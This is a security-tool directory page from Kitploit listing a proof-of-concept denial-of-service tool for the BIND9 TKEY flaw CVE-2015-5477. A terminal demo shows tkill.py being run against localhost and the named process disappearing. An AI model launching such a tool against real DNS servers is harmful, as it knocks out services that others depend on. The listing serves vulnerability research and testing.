Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2015-5477 — PoC for BIND9 TKEY assert DoS (CVE-2015-5477) | Kitploit
Tools/GitHubGitHub/knqyf263/cve-2015-5477
Vulnerability AnalysisExploitationNetwork SecurityDNS Analysis
GitHubknqyf263/cve-2015-5477

cve-2015-5477

PoC for BIND9 TKEY assert DoS (CVE-2015-5477)

View Repository
111 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2015-5477

PoC for BIND9 TKEY assert DoS (CVE-2015-5477)

root@kitploit:~
$ ps awux | grep -v grep | grep bind
bind      2373  0.0  2.2 141164 13424 ?        Ssl  14:58   0:00 /var/named/chroot/sbin/named -u bind -t /var/named/chroot -c /etc/named.conf
$ python tkill.py 127.0.0.1
Begin emission:
..Finished to send 1 packets.
.......................................................................................................................................................................................................................^C
Received 217 packets, got 0 answers, remaining 1 packets
$ ps awux | grep -v grep | grep bind
$
Download Tool